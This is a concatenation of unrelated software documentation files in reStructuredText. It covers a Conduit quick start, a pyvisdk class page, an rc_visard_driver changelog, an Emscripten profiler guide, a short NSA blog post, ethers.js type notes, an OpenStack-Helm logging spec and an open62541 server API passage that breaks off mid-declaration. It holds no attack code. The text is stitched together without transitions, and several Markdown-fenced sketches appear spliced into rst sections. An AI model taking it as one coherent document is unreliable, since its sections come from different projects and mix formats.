.. #
.. # Redistribution and use in source and binary forms, with or without
.. # modification, are permitted provided that the following conditions are met:
.. #
.. # * Redistributions of source code must retain the above copyright notice,
.. # this list of conditions and the disclaimer below.
.. #
.. # * Redistributions in binary form must reproduce the above copyright notice,
.. # this list of conditions and the disclaimer (as noted below) in the
.. # documentation and/or other materials provided with the distribution.
.. #
.. # * Neither the name of the LLNS/LLNL nor the names of its contributors may
.. # be used to endorse or promote products derived from this software without
.. # specific prior written permission.
.. #
.. # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
.. # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
.. # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
.. # ARE DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL SECURITY,
.. # LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE LIABLE FOR ANY
.. # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
.. # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
.. # OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
.. # HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
.. # STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
.. # IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
.. # POSSIBILITY OF SUCH DAMAGE.
.. #
.. ############################################################################
.. _getting_started:
================================
Quick Start
================================
Installing Conduit and Third Party Dependencies
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The quickest path to installing Conduit and its dependencies is via :ref:`uberenv <building_with_uberenv>`:
.. code:: bash

    git clone --recursive https://github.com/llnl/conduit.git
    cd conduit
    python scripts/uberenv/uberenv.py --install --prefix="build"
After this completes, ``build/conduit-install`` will contain a Conduit install.
For more details about building and installing Conduit see :doc:`building`. This page provides detailed info about Conduit's CMake options, :ref:`uberenv <building_with_uberenv>` and :ref:`Spack <building_with_spack>` support. We also provide info about :ref:`building for known HPC clusters using uberenv <building_known_hpc>` and a :ref:`Docker example <building_with_docker>` that leverages Spack.
Using Conduit in Your Project
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The install includes examples that demonstrate how to use Conduit in a CMake-based build system and via a Makefile.
CMake-based build system example (see: ``examples/conduit/using-with-cmake``):
.. literalinclude:: ../../examples/using-with-cmake/CMakeLists.txt
   :lines: 45-63
   :dedent: 2
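For orientation, such a ``CMakeLists.txt`` typically boils down to something like the sketch below. The install prefix path and the exact imported target name are assumptions for illustration — the shipped ``using-with-cmake`` example above is authoritative:

```cmake
cmake_minimum_required(VERSION 3.0)
project(conduit_example)

# Point CMake at the Conduit install created earlier (illustrative path).
set(CONDUIT_DIR "/path/to/conduit-install" CACHE PATH "Conduit install prefix")

# Locate Conduit's exported CMake package.
find_package(Conduit REQUIRED
             NO_DEFAULT_PATH
             PATHS "${CONDUIT_DIR}/lib/cmake")

add_executable(conduit_example conduit_example.cpp)
target_link_libraries(conduit_example conduit::conduit)
```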
Makefile-based build system example (see: ``examples/conduit/using-with-make``):
.. literalinclude:: ../../examples/using-with-make/Makefile
   :lines: 45-55
   :dedent: 2
Learning Conduit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To get started learning the core Conduit API, see the Conduit Tutorials for :doc:`C++ <tutorial_cpp>` and :doc:`Python <tutorial_python>`.
================================================================================
HostMultipathInfoLogicalUnit
================================================================================
.. describe:: Property of

   :py:class:`~pyvisdk.do.host_multipath_info.HostMultipathInfo`,
   :py:class:`~pyvisdk.do.host_multipath_info_path.HostMultipathInfoPath`

.. describe:: See also

   :py:class:`~pyvisdk.do.host_multipath_info_logical_unit_policy.HostMultipathInfoLogicalUnitPolicy`,
   :py:class:`~pyvisdk.do.host_multipath_info_logical_unit_storage_array_type_policy.HostMultipathInfoLogicalUnitStorageArrayTypePolicy`,
   :py:class:`~pyvisdk.do.host_multipath_info_path.HostMultipathInfoPath`,
   :py:class:`~pyvisdk.do.scsi_lun.ScsiLun`

.. describe:: Extends

   :py:class:`~pyvisdk.mo.dynamic_data.DynamicData`

.. class:: pyvisdk.do.host_multipath_info_logical_unit.HostMultipathInfoLogicalUnit

   .. py:attribute:: id

      Identifier of the LogicalUnit.

   .. py:attribute:: key

      Linkable identifier.

   .. py:attribute:: lun

      The SCSI device corresponding to the logical unit.

   .. py:attribute:: path

      The array of paths available to access this LogicalUnit.

   .. py:attribute:: policy

      Policy that the logical unit should use when selecting a path.

   .. py:attribute:: storageArrayTypePolicy

      Policy used to determine how a storage device is accessed. This policy is currently immutable.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Changelog for package rc_visard_driver
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2.7.0 (2019-07-19)
------------------
* replaced std_srvs/Trigger with rc_common_msgs/Trigger
* add support for setting exposure region via dynamic_reconfigure
2.6.4 (2019-06-19)
------------------
* fix race condition when changing exposure mode from auto to manual
* require ROS version with SteadyTime
* use enums in dynamic reconfigure for easier usage
2.6.3 (2019-06-12)
------------------
2.6.2 (2019-06-11)
------------------
2.6.1 (2019-05-20)
------------------
2.6.0 (2019-05-20)
------------------
* auto-start dynamics only on the very first startup
* improve handling and error messages for dynamics streams
* update exposure and gain after switching from auto to manual
* add check if rc_visard ready (genicam feature: RcSystemReady)
* if multipart is available, still send single components per buffer
* refactoring/cleanup
2.5.0 (2019-02-05)
------------------
* add parameter for max number of reconnections
* fix: enable driver to try to recover even if the very first time no connection worked out
* add diagnostics
* fix reporting of package size
* Fixed hanging image streams after restart of sensor
* Support for rc_visard firmware v1.5.0 additions (require `StereoPlus` license)
* quality full
* advanced smoothing
* improved driver's auto-connect behavior
* also reapply dynamic_reconfigure params after recovery
* fix projection matrix in published right CameraInfo
2.4.2 (2018-10-29)
------------------
2.4.1 (2018-10-29)
------------------
* Fixed link error if rc_genicam_api is not installed in a standard directory
* docker images: upgrade packages first
2.4.0 (2018-10-16)
------------------
* added `depth_acquisition_mode` parameter
* added `depth_acquisition_trigger` service call
* Reduced latency for passing changes of dynamic parameters and topic descriptions to GenICam
* Fixed using wrong disparity range in disparity color publisher
* now depends on rc_genicam_api >= 2.0.0
2.3.0 (2018-08-21)
------------------
* read params from parameter server before falling back to current device params
* New image topics ...out1_low and ...out1_high are offered if iocontrol module is available
2.2.1 (2018-07-05)
------------------
* Changed to component intensity before changing pixel format for supporting color rc_visards with version >= 1.3.0
2.2.0 (2018-07-03)
------------------
* fix out1_mode/out2_mode description and default
* change/add service calls for onboard SLAM module:
- rename `dynamics_reset_slam` to `slam_reset`
- rename `get_trajectory` to `slam_get_trajectory`
- add `slam_save_map`, `slam_load_map` and `slam_remove_map`
* install Rviz example config file
2.1.1 (2018-06-15)
------------------
* Adjusting disparity range to content of disparity image for colored disparity visualization
* Added debug message if left and disparity images cannot be synchronized for creating point clouds
* Implemented parameters for IO control and relaxed time synchronization in case of exposure alternate mode
2.1.0 (2018-04-23)
------------------
* add ptp_enabled dynamic_reconfigure parameter (to enable PrecisionTimeProtocol Slave on rc_visard)
* add reset service for SLAM
* README updates
* use 'rc_visard' as default device name (works with one rc_visard with factory settings connected)
2.0.0 (2018-02-27)
------------------
* rc_genicam_api and rc_dynamics_api as dependency instead of submodule
* don't reset if datastreams time out
* added get_trajectory service
* Use new statemachine interface
Return codes are now strings.
* Add services start_slam, restart_slam and stop_slam
* Publishing dynamics as odometry message
* visualizing dynamics message
- angular velocity, linear acceleration published as marker
for visualization
- cam2imu-transform is published with re-created timestamp
* Contributors: Christian Emmerich, Felix Endres, Felix Ruess, Heiko Hirschmueller
1.2.1 (2018-02-26)
------------------
* use rc_genicam_api as dependency
instead of including as submodule
also remove launchfile, as the device is a required parameter anyway...
* Contributors: Felix Ruess
1.2.0 (2018-02-11)
------------------
* Setting default of median to 1 instead of 0, which also means off
* install rc_visard_driver node in package lib dir, so start it with `rosrun rc_visard_driver rc_visard_driver`
1.1.3 (2017-04-13)
------------------
* Added possibility to start as ROS node alternatively to nodelet
* Printing shutdown information to stdout, since ROS log messages just before exit disappear
1.1.2 (2017-04-11)
------------------
* The module reconnects to the GigE Vision server in case of errors
* Added reporting enabled componets and missing images
1.1.0 (2017-04-10)
------------------
* Implemented setting camera framerate via dynamic reconfigure
* Implementation of dynamic reconfigure parameters for controlling the depth image
1.0.1 (2017-03-16)
------------------
* Focal length of disparity image now relates to the size of the disparity image
* Use color for point cloud if color images are available
1.0.0 (2017-03-05)
------------------
* Initial release
.. _Profiling-Toolchain:
=======================
Profiling the Toolchain
=======================
The toolchain interacts with a moderate number of external tools and sublibraries; the exact set generally depends on which compilation and linker flags were used. If you are seeing abnormal compilation times, or if you are developing the Emscripten toolchain itself, it may be useful to profile the toolchain performance itself as it compiles your project. Emscripten has a built-in toolchain-wide ``emprofile.py`` profiler that can be used for this purpose.
Quick Example
=============
To try out the toolchain profiler, run the following set of commands:
.. code-block:: bash

   cd path/to/emscripten
   tools/emprofile.py --reset
   export EM_PROFILE_TOOLCHAIN=1
   emcc tests/hello_world.c -O3 -o a.html
   tools/emprofile.py --graph
On Windows, replace the ``export`` keyword with ``set`` instead. The last command should generate an HTML file of the form ``toolchain_profiler.results_yyyymmdd_hhmm.html`` that can be opened in the web browser to view the results.
Details
=======
The toolchain profiler is active whenever the toolchain is invoked with the environment variable ``EM_PROFILE_TOOLCHAIN=1`` being set. In this mode, each called tool will accumulate profiling instrumentation data to a set of .json files under the Emscripten temp directory.
Profiling Tool Commands
-----------------------
The command ``tools/emprofile.py --reset`` deletes all previously stored profiling data. Call this command to erase the profiling session to a fresh empty state. To start profiling, call Emscripten tool commands with the environment variable ``EM_PROFILE_TOOLCHAIN=1`` set either system-wide as shown in the example, or on a per command basis, like this:
.. code-block:: bash

   cd path/to/emscripten
   tools/emprofile.py --reset
   EM_PROFILE_TOOLCHAIN=1 emcc tests/hello_world.c -o a.bc
   EM_PROFILE_TOOLCHAIN=1 emcc a.bc -O3 -o a.html
   tools/emprofile.py --graph --outfile=myresults.html
Any number of commands can be profiled within one session, and when ``tools/emprofile.py --graph`` is finally called, it will pick up records from all Emscripten tool invocations up to that point. Calling ``--graph`` also clears the recorded profiling data.
The output HTML filename can be chosen with the optional ``--outfile=myresults.html`` parameter.
Instrumenting Python Scripts
============================
In order for the toolchain profiler to work, each "top level" Python script (a script that is directly called from the command line, or by a subprocess spawn) should have the following preamble in the beginning of the script:
.. code-block:: python

   from tools.toolchain_profiler import ToolchainProfiler
   if __name__ == '__main__':
       ToolchainProfiler.record_process_start()
Additionally, at the end of the script when the script is about to exit, it should do so by explicitly calling either the ``sys.exit(<returncode>)`` function, or by calling the ``ToolchainProfiler.record_process_exit(<returncode>)`` function, whichever is more convenient for the script. The function ``ToolchainProfiler.record_process_exit()`` does not exit by itself, but only records that the process is quitting.
These two blocks ensure that the toolchain profiler will be aware of all tool invocations that occur. In the graphed output, the process spawns will be shown in green color.
Python Profiling Blocks
-----------------------
Graphing the subprocess start and end times alone might sometimes give too coarse a view into what is happening. In Python code, it is possible to hierarchically annotate individual blocks of code to break down execution into custom tasks. These blocks will be shown in blue in the output graph. To add a custom profiling block, use the Python ``with`` keyword to add a ``profile_block`` section:
.. code-block:: python

   with ToolchainProfiler.profile_block('my_custom_task'):
       do_some_tasks()
       call_another_function()
       more_code()
   this_is_outside_the_block()
This will show the three functions in the same scope under a block 'my_custom_task' drawn in blue in the profiling swimlane.
In some cases it may be cumbersome to wrap the code inside a ``with`` section. For these scenarios, it is also possible to use low level C-style ``enter_block`` and ``exit_block`` statements.
.. code-block:: python

   ToolchainProfiler.enter_block('my_code_block')
   try:
       do_some_tasks()
       call_another_function()
       more_code()
   finally:
       ToolchainProfiler.exit_block('my_code_block')
However when using this form one must be cautious to ensure that each call to ``ToolchainProfiler.enter_block()`` is matched by exactly one call to ``ToolchainProfiler.exit_block()`` in all code flows, so wrapping the code in a ``try-finally`` statement is a good idea.
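To illustrate why the matched pairing (and the ``with`` form's guarantee) matters, here is a tiny self-contained stand-in — not the real ``ToolchainProfiler`` — showing that a context-manager block records its exit even when the wrapped code raises:

```python
import contextlib

events = []

@contextlib.contextmanager
def profile_block(name):
    """Minimal stand-in for ToolchainProfiler.profile_block."""
    events.append(('enter', name))
    try:
        yield
    finally:
        # The exit record is written even if the block raises.
        events.append(('exit', name))

try:
    with profile_block('my_custom_task'):
        raise RuntimeError('something failed mid-block')
except RuntimeError:
    pass

print(events)  # [('enter', 'my_custom_task'), ('exit', 'my_custom_task')]
```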
NSA Plays World of Warcraft
############################
:date: 2013-12-09 21:44
:slug: nsa-in-wow
:tags: NSA
Heh, so the NSA has also been "spying" in World of Warcraft [1]...
[1] `Spy agencies in covert push to infiltrate virtual world of online gaming <http://www.theguardian.com/world/2013/dec/09/nsa-spies-online-games-world-warcraft-second-life>`_
Internal API Documentation
==========================
In addition to the public API, the classes and functions documented here are available for use within HWI itself.
.. automodule:: hwilib._base58
   :members:

.. automodule:: hwilib._bech32
   :members:

.. automodule:: hwilib._script
   :members:

.. automodule:: hwilib._serialize
   :members:
=================
Sphinx on Netlify
=================
A minimalistic example of hosting Sphinx on Netlify.
Install
========
Just clone this repository and then deploy it from `Netlify`_. Nothing needs to be changed and it will work out of the box.
Tweaking
========
You can tweak and play with your newly deployed website. Feel free to browse through the `sphinx`_ documentation to tweak the outputs as per your requirements.
Pull Request
============
If you have suggestions or improvements, please consider submitting a pull request or creating an issue.
.. toctree::
   :maxdepth: 2
.. _sphinx: https://www.sphinx-doc.org/en/master/
.. _Netlify: https://www.netlify.com/
User Manual
===========
.. toctree::

   application.rst
   plugin
   library
Common Types
************
There are several parameter formats and types that come up often:
- Addresses_ -- Ethereum Accounts and Contracts all have an address, which is needed to interact with them
- `Big Numbers`_ (BN.js) -- Precise numbers to work around JavaScript's lossy floating point system
- `Hex Strings`_ -- Strings of hexidecimal encoded binary data and numbers
- `Errors` -- An error indicating the user (explicitly or implicitly) cancelled an operation
.. _addresses:
Addresses
=========
Addresses come in many formats, and any may be used.
- Hex Strings (eg. 0x1234567890abcdef1234567890abcdef12345678)
- ICAP Addresses (eg. XE0724JX5HRQ9R1XA24VWJM008DMOB17YBC)
- Checksum Address (eg. 0x1234567890AbcdEF1234567890aBcdef12345678; notice uppercase and lowercase letters)
The **ICAP Address** format uses the `International Bank Account Number (IBAN)`_
format with a prefix of ``XE``.
The **Checksum Address** format uses a mixture of uppercase and lowercase
letters to encode checksum information in an address, but remains backward
compatible with systems that do not understand checksum addresses. Because of
this, addresses which are not checksum addresses must use entirely uppercase or
entirely lowercase letters.
To convert between the various formats::

    // Get an ICAP address (from any address format)
    var icapAddress = ethers.getAddress(address, true);

    // Get a checksum address (from any address format)
    var address = ethers.getAddress(address)
.. _big-numbers:
Big Numbers
===========
Since **Ethereum** deals a great deal with large numeric values (far larger
than JavaScript can handle without `loss of precision`_), many calls require and return instances
of **BigNumber**.
Some common things you will likely want to do with a **BigNumber**::

    // Convert to base 10 string
    var valueBase10 = value.toString();

    // Convert to a number (only valid for values that fit in 53 bits)
    var valueNumber = value.toNumber();

    // Convert to hex string
    var valueHexString = value.toHexString();

    // Convert from a base 10 string
    var value = ethers.utils.bigNumberify('1000000');

    // Convert from a hex string (the 0x prefix is REQUIRED)
    var value = ethers.utils.bigNumberify('0xf4240');

    // Multiply two values
    var product = value1.mul(value2)

    // Convert from ether (string) to wei (BN)
    var wei = ethers.parseEther('1.0');

    // Convert from wei to ether (string)
    var ether = ethers.formatEther(wei)
.. _hex-strings:
Hex Strings
===========
Often functions deal with binary data, which should be specified using a hex
string. Functions which require big numbers can also be passed the
hex string equivalent.
It is important to note, it **MUST** be a string, and it **MUST** begin with
the prefix ``0x``.
Example::

    var binaryHelloWorld = '0x48656c6c6f576f726c64';
    var thirtySeven = '0x25';

    // Convert a hex string to a byte Array
    ethers.utils.arrayify(binaryHelloWorld);
    // Uint8Array [ 72, 101, 108, 108, 111, 87, 111, 114, 108, 100 ]

    // Convert a byte Array to a hex string
    ethers.utils.hexlify([12, 34, 56]);
    // '0x0c2238'

    // Convert a number to a hex string
    ethers.utils.hexlify(37);
    // '0x25'
Errors
======
.. _cancelled-error:
Cancelled Error
---------------
Any operation which requires the user to accept or decline, may reject with an error
with the message `cancelled`. This could occur without user interaction, if for example,
the application attempts to send a transaction, but the user is new and has not added
an account.
Example::

    somePromise.then(function(result) {
        // The call returned a result
    }, function(error) {
        if (error.message === 'cancelled') {
            // Whatever needs to be done
        }
    });
.. _server-error:
Server Error
------------
Any operation that requests further information from the **ethers.io services**
may reject with an error with the message ``server error``.
Example::

    somePromise.then(function(result) {
        // The call returned a result
    }, function(error) {
        if (error.message === 'server error') {
            // Whatever needs to be done
        }
    });
.. _Promise: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise
.. _loss of precision: http://docs.oracle.com/cd/E19957-01/806-3568/ncg_goldberg.html
.. _BN.js on GitHub: https://github.com/indutny/bn.js
.. _international bank account number (iban): https://en.wikipedia.org/wiki/International_Bank_Account_Number
.. _foobar: http://www.ecma-international.org/ecma-262/5.1/#sec-8.5
.. _foobar2: http://reference.wolfram.com/language/tutorial/MachinePrecisionNumbers.html
.. _foobar3: http://floating-point-gui.de/formats/fp/
..
This work is licensed under a Creative Commons Attribution 3.0 Unported
License.
http://creativecommons.org/licenses/by/3.0/legalcode
..
=====================================
OSH Logging, Monitoring, and Alerting
=====================================
Blueprints:
1. osh-monitoring_
2. osh-logging-framework_
.. _osh-monitoring: https://blueprints.launchpad.net/openstack-helm/+spec/osh-monitoring
.. _osh-logging-framework: https://blueprints.launchpad.net/openstack-helm/+spec/osh-logging-framework
Problem Description
===================
OpenStack-Helm currently lacks a centralized mechanism for providing insight
into the performance of the OpenStack services and infrastructure components.
The log formats of the different components in OpenStack-Helm vary, which makes
identifying causes for issues difficult across services. To support operational
readiness by default, OpenStack-Helm should include components for logging
events in a common format, monitoring metrics at all levels, alerting and alarms
for those metrics, and visualization tools for querying the logs and metrics in
a single pane view.
Platform Requirements
=====================
Logging Requirements
--------------------
The requirements for a logging platform include:
1. All services in OpenStack-Helm log to stdout and stderr by default
2. Log collection daemon runs on each node to forward logs to storage
3. Proper directories mounted to retrieve logs from the node
4. Ability to apply custom metadata and uniform format to logs
5. Time-series database for logs collected
6. Backed by highly available storage
7. Configurable log rotation mechanism
8. Ability to perform custom queries against stored logs
9. Single pane visualization capabilities
Monitoring Requirements
-----------------------
The requirements for a monitoring platform include:
1. Time-series database for collected metrics
2. Backed by highly available storage
3. Common method to configure all monitoring targets
4. Single pane visualization capabilities
5. Ability to perform custom queries against metrics collected
6. Alerting capabilities to notify operators when thresholds exceeded
Use Cases
=========
Logging Use Cases
-----------------
Example uses for centralized logging include:
1. Record compute instance behavior across nodes and services
2. Record OpenStack service behavior and status
3. Find all backtraces for a tenant id's uuid
4. Identify issues with infrastructure components, such as RabbitMQ, mariadb, etc
5. Identify issues with Kubernetes components, such as: etcd, CNI, scheduler, etc
6. Organizational auditing needs
7. Visualize logged events to determine if an event is recurring or an outlier
8. Find all logged events that match a pattern (service, pod, behavior, etc)
Monitoring Use Cases
--------------------
Example OpenStack-Helm metrics requiring monitoring include:
1. Host utilization: memory usage, CPU usage, disk I/O, network I/O, etc
2. Kubernetes metrics: pod status, replica availability, job status, etc
3. Ceph metrics: total pool usage, latency, health, etc
4. OpenStack metrics: tenants, networks, flavors, floating IPs, quotas, etc
5. Proactive monitoring of stack traces across all deployed infrastructure
Examples of how these metrics can be used include:
1. Add or remove nodes depending on utilization
2. Trigger alerts when desired replicas fall below required number
3. Trigger alerts when services become unavailable or unresponsive
4. Identify etcd performance that could lead to cluster instability
5. Visualize performance to identify trends in traffic or utilization over time
Proposed Change
===============
Logging
-------
Fluentd, Elasticsearch, and Kibana meet OpenStack-Helm's logging requirements
for capture, storage and visualization of logged events. Fluentd runs as a
daemonset on each node and mounts the /var/lib/docker/containers directory.
The Docker container runtime engine directs events posted to stdout and stderr
to this directory on the host. Fluentd should then declare the contents of
that directory as an input stream, and use the fluent-plugin-elasticsearch
plugin to apply the Logstash format to the logs. Fluentd will also use the
fluentd-plugin-kubernetes-metadata plugin to write Kubernetes metadata to the
log record. Fluentd will then forward the results to Elasticsearch, which
indexes the logs in a logstash-* index by default. The resulting logs can then
be queried directly through Elasticsearch, or they can be viewed via Kibana.
Kibana offers a dashboard that can create custom views on logged events, and
Kibana integrates well with Elasticsearch by default.
The proposal includes the following:
1. Helm chart for Fluentd
2. Helm chart for Elasticsearch
3. Helm chart for Kibana
All three charts must include sensible configuration values to make the
logging platform usable by default. These include: proper input configurations
for Fluentd, proper metadata and formats applied to the logs via Fluentd,
sensible indexes created for Elasticsearch, and proper configuration values for
Kibana to query the Elasticsearch indexes previously created.
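As a rough sketch of the kind of Fluentd configuration this implies (the paths, tags, and the Elasticsearch hostname below are illustrative assumptions, not chart defaults):

```text
<source>
  @type tail
  path /var/lib/docker/containers/*/*.log
  pos_file /var/log/fluentd-containers.log.pos
  tag kubernetes.*
  format json
</source>

<filter kubernetes.**>
  # fluent-plugin-kubernetes-metadata: attach pod/namespace metadata
  @type kubernetes_metadata
</filter>

<match kubernetes.**>
  # fluent-plugin-elasticsearch: apply the Logstash format and forward
  @type elasticsearch
  host elasticsearch-logging
  port 9200
  logstash_format true
</match>
```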
Monitoring
----------
Prometheus and Grafana meet OpenStack-Helm's monitoring requirements. The
Prometheus monitoring tool provides the ability to scrape targets for metrics
over HTTP, and it stores these metrics in Prometheus's time-series database.
The monitoring targets can be discovered via static configuration in Prometheus
or through service discovery. Prometheus includes a query language for running
meaningful queries against the gathered metrics, and it supports the creation
of rules to evaluate these metrics against for alerting purposes. It
also supports a wide range of Prometheus exporters for existing services,
including Ceph and OpenStack. Grafana supports Prometheus as a data source, and
provides the ability to view the metrics gathered by Prometheus in a single pane
dashboard. Grafana can be bootstrapped with dashboards for each target scraped,
or the dashboards can be added via Grafana's web interface directly. To meet
OpenStack-Helm's alerting needs, Alertmanager can be used to interface with
Prometheus and send alerts based on Prometheus rule evaluations.
The proposal includes the following:
1. Helm chart for Prometheus
2. Helm chart for Alertmanager
3. Helm chart for Grafana
4. Helm charts for any appropriate Prometheus exporters
All charts must include sensible configuration values to make the monitoring
platform usable by default. These include: static Prometheus configurations
for the included exporters, static dashboards for Grafana mounted via configMaps,
and configurations for Alertmanager out of the box.
Security Impact
---------------
All services running within the platform should be subject to the
security practices applied to the other OpenStack-Helm charts.
Performance Impact
------------------
To minimize the performance impacts, the following should be considered:
1. Sane defaults for log retention and rotation policies
2. Identify opportunities for improving Prometheus's operation over time
3. Elasticsearch configured to prevent memory swapping to disk
4. Elasticsearch configured in a highly available manner with sane defaults
Implementation
==============
Assignee(s)
-----------
Primary assignees:
srwilker (Steve Wilkerson)
portdirect (Pete Birley)
lr699s (Larry Rensing)
Work Items
----------
1. Fluentd chart
2. Elasticsearch chart
3. Kibana chart
4. Prometheus chart
5. Alertmanager chart
6. Grafana chart
7. Charts for exporters: kube-state-metrics, ceph-exporter, openstack-exporter?
All charts should follow design approaches applied to all other OpenStack-Helm
charts, including the use of helm-toolkit.
All charts require valid and sensible default values to provide operational
value out of the box.
Testing
=======
Testing should include Helm tests for each of the included charts as well as an
integration test in the gate.
Documentation Impact
====================
Documentation should be included for each of the included charts as well as
documentation detailing the requirements for a usable monitoring platform,
preferably with sane default values out of the box.
.. _server:
Server
======
.. include:: server_config.rst
.. _server-lifecycle:
Server Lifecycle
----------------
.. code-block:: c
UA_Server * UA_Server_new(void);
/* Makes a (shallow) copy of the config into the server object.
* The config content is cleared together with the server. */
UA_Server *
UA_Server_newWithConfig(const UA_ServerConfig *config);
void UA_Server_delete(UA_Server *server);
UA_ServerConfig *
UA_Server_getConfig(UA_Server *server);
/* Runs the main loop of the server. In each iteration, this calls into the
* networklayers to see if messages have arrived.
*
* @param server The server object.
* @param running The loop is run as long as *running is true.
* Otherwise, the server shuts down.
* @return Returns the statuscode of the UA_Server_run_shutdown method */
UA_StatusCode
UA_Server_run(UA_Server *server, const volatile UA_Boolean *running);
/* The prologue part of UA_Server_run (no need to use if you call
* UA_Server_run) */
UA_StatusCode
UA_Server_run_startup(UA_Server *server);
/* Executes a single iteration of the server's main loop.
*
* @param server The server object.
* @param waitInternal Should we wait for messages in the networklayer?
 * Otherwise, the timeouts for the networklayers are set to zero.
 * The default max wait time is 50 ms.
* @return Returns how long we can wait until the next scheduled
* callback (in ms) */
UA_UInt16
UA_Server_run_iterate(UA_Server *server, UA_Boolean waitInternal);
/* The epilogue part of UA_Server_run (no need to use if you call
* UA_Server_run) */
UA_StatusCode
UA_Server_run_shutdown(UA_Server *server);
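A minimal ``main`` for a server can be sketched as follows. This is an
illustration only; it assumes the default configuration helper
``UA_ServerConfig_setDefault`` from the plugin header
``open62541/server_config_default.h``:

.. code-block:: c

   #include <open62541/server.h>
   #include <open62541/server_config_default.h>
   #include <signal.h>

   static volatile UA_Boolean running = true;

   static void stopHandler(int sig) {
       running = false; /* makes UA_Server_run return */
   }

   int main(void) {
       signal(SIGINT, stopHandler);

       UA_Server *server = UA_Server_new();
       UA_ServerConfig_setDefault(UA_Server_getConfig(server));

       /* Runs the main loop until 'running' becomes false */
       UA_StatusCode retval = UA_Server_run(server, &running);

       UA_Server_delete(server);
       return retval == UA_STATUSCODE_GOOD ? 0 : 1;
   }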
Timed Callbacks
---------------
.. code-block:: c
typedef void (*UA_ServerCallback)(UA_Server *server, void *data);
/* Add a callback for execution at a specified time. If the indicated time lies
* in the past, then the callback is executed at the next iteration of the
* server's main loop.
*
* @param server The server object.
* @param callback The callback that shall be added.
* @param data Data that is forwarded to the callback.
* @param date The timestamp for the execution time.
 * @param callbackId Set to the identifier of the scheduled callback. This can
* be used to cancel the callback later on. If the pointer is null, the
* identifier is not set.
* @return Upon success, UA_STATUSCODE_GOOD is returned. An error code
* otherwise. */
UA_StatusCode
UA_Server_addTimedCallback(UA_Server *server, UA_ServerCallback callback,
void *data, UA_DateTime date, UA_UInt64 *callbackId);
/* Add a callback for cyclic repetition to the server.
*
* @param server The server object.
* @param callback The callback that shall be added.
* @param data Data that is forwarded to the callback.
* @param interval_ms The callback shall be repeatedly executed with the given
* interval (in ms). The interval must be positive. The first execution
* occurs at now() + interval at the latest.
 * @param callbackId Set to the identifier of the repeated callback. This can
* be used to cancel the callback later on. If the pointer is null, the
* identifier is not set.
* @return Upon success, UA_STATUSCODE_GOOD is returned. An error code
* otherwise. */
UA_StatusCode
UA_Server_addRepeatedCallback(UA_Server *server, UA_ServerCallback callback,
void *data, UA_Double interval_ms, UA_UInt64 *callbackId);
UA_StatusCode
UA_Server_changeRepeatedCallbackInterval(UA_Server *server, UA_UInt64 callbackId,
UA_Double interval_ms);
/* Remove a repeated callback. Does nothing if the callback is not found.
*
* @param server The server object.
* @param callbackId The id of the callback */
void
UA_Server_removeCallback(UA_Server *server, UA_UInt64 callbackId);
#define UA_Server_removeRepeatedCallback(server, callbackId) \
UA_Server_removeCallback(server, callbackId);
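As an illustration, a repeated callback that logs a heartbeat every two
seconds might look as follows (the logging via ``UA_Log_Stdout`` assumes the
stdout logger plugin header is available):

.. code-block:: c

   static void heartbeat(UA_Server *server, void *data) {
       UA_LOG_INFO(UA_Log_Stdout, UA_LOGCATEGORY_USERLAND, "heartbeat");
   }

   /* During server setup: execute every 2000 ms */
   UA_UInt64 callbackId;
   UA_Server_addRepeatedCallback(server, heartbeat, NULL, 2000.0, &callbackId);

   /* Later, e.g. before shutdown */
   UA_Server_removeCallback(server, callbackId);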
Reading and Writing Node Attributes
-----------------------------------
The functions for reading and writing node attributes call the regular read
and write services in the background that are also used over the network.
The following attributes cannot be read, since the local "admin" user always
has full rights.
- UserWriteMask
- UserAccessLevel
- UserExecutable
.. code-block:: c
/* Read an attribute of a node. The specialized functions below provide a more
* concise syntax.
*
* @param server The server object.
* @param item ReadValueIds contain the NodeId of the target node, the id of the
* attribute to read and (optionally) an index range to read parts
* of an array only. See the section on NumericRange for the format
* used for array ranges.
* @param timestamps Which timestamps to return for the attribute.
* @return Returns a DataValue that contains either an error code, or a variant
* with the attribute value and the timestamps. */
UA_DataValue
UA_Server_read(UA_Server *server, const UA_ReadValueId *item,
UA_TimestampsToReturn timestamps);
/* Don't use this function. There are typed versions for every supported
* attribute. */
UA_StatusCode
__UA_Server_read(UA_Server *server, const UA_NodeId *nodeId,
UA_AttributeId attributeId, void *v);
static UA_INLINE UA_StatusCode
UA_Server_readNodeId(UA_Server *server, const UA_NodeId nodeId,
UA_NodeId *outNodeId) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_NODEID, outNodeId);
}
static UA_INLINE UA_StatusCode
UA_Server_readNodeClass(UA_Server *server, const UA_NodeId nodeId,
UA_NodeClass *outNodeClass) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_NODECLASS,
outNodeClass);
}
static UA_INLINE UA_StatusCode
UA_Server_readBrowseName(UA_Server *server, const UA_NodeId nodeId,
UA_QualifiedName *outBrowseName) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_BROWSENAME,
outBrowseName);
}
static UA_INLINE UA_StatusCode
